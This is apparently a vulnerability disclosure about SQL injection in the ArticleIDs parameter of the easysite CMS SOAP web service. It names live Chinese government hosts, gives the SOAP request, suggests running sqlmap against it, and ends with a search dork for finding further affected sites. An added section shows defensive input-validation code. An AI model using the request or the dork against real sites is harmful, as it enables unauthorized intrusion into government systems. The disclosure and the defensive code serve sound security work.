### Brief description:
Web services don't lie~!
A large number of gov sites use the easysite content management system.
### Details:
1. SOAP injection
easysite web service file:
```
http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx
```
[![soap.png](https://images.seebug.org/upload/201406/16205754b156bffb45e993cebd2705c5433a0a3f.png)](https://images.seebug.org/upload/201406/16205754b156bffb45e993cebd2705c5433a0a3f.png)
2. The ArticleIDs parameter is vulnerable to SQL injection
[![sql1.png](https://images.seebug.org/upload/201406/16205943eaac7fc9387e0624469c89834d6a2f60.png)](https://images.seebug.org/upload/201406/16205943eaac7fc9387e0624469c89834d6a2f60.png)
[![SQL2.png](https://images.seebug.org/upload/201406/162103065ae6e39928fb3b9728a50f595bbbf716.png)](https://images.seebug.org/upload/201406/162103065ae6e39928fb3b9728a50f595bbbf716.png)
Just pick any one and run it through sqlmap.
```
POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1
Host: dynamic.xmedu.gov.cn
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetArticleHitsArray"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetArticleHitsArray xmlns="http://tempuri.org/">
<ArticleIDs>string</ArticleIDs>
</GetArticleHitsArray>
</soap:Body>
</soap:Envelope>
```
[![sql3.png](https://images.seebug.org/upload/201406/162107259e0f64badcbb148e3305dda96ef7b887.png)](https://images.seebug.org/upload/201406/162107259e0f64badcbb148e3305dda96ef7b887.png)
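An added example, not part of the original report and not easysite code: a server-side gate that parses the `GetArticleHitsArray` request shown above, accepts `ArticleIDs` only as a list of integers, and binds each ID as a query parameter. It assumes `ArticleIDs` is a comma-separated list of decimal IDs; the function names, the `article` table and the in-memory SQLite database are hypothetical stand-ins.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP = "{http://schemas.xmlsoap.org/soap/envelope/}"
SVC = "{http://tempuri.org/}"
# Assumption: ArticleIDs is a comma-separated list of decimal article IDs.
ID_LIST = re.compile(r"[0-9]{1,10}(?:,[0-9]{1,10}){0,199}")


def parse_article_ids(soap_xml):
    """Return the requested IDs as a list of int, or raise ValueError."""
    if "<!DOCTYPE" in soap_xml:  # SOAP messages must not carry a DTD
        raise ValueError("DTD not allowed")
    try:
        root = ET.fromstring(soap_xml)
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    node = root.find(f"{SOAP}Body/{SVC}GetArticleHitsArray/{SVC}ArticleIDs")
    if node is None:
        raise ValueError("ArticleIDs missing")
    value = (node.text or "").strip()
    if not ID_LIST.fullmatch(value):
        raise ValueError("ArticleIDs is not a list of integers")
    return [int(part) for part in value.split(",")]


def article_hits(conn, ids):
    """Look up hit counts with one bound parameter per ID; values never enter the SQL text."""
    marks = ",".join("?" for _ in ids)
    sql = f"SELECT id, hits FROM article WHERE id IN ({marks})"
    return dict(conn.execute(sql, ids).fetchall())


def envelope(value):  # constructed request in the shape shown on this page
    return ('<?xml version="1.0" encoding="utf-8"?>'
            '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><GetArticleHitsArray xmlns="http://tempuri.org/">'
            f"<ArticleIDs>{escape(value)}</ArticleIDs>"
            "</GetArticleHitsArray></soap:Body></soap:Envelope>")


def demo_db():  # in-memory stand-in for the CMS database (hypothetical schema)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, hits INTEGER)")
    conn.executemany("INSERT INTO article VALUES (?, ?)", [(101, 7), (102, 3), (103, 12)])
    return conn
```

Rejected requests are also worth logging: a non-numeric `ArticleIDs` value sent to this endpoint is a useful detection signal.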
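### Proof of vulnerability:
If you don't know who is using easysite, just google it (if you can open it):
inurl:asmx DesktopModules
(N domains of the General Administration of Customs all run this system)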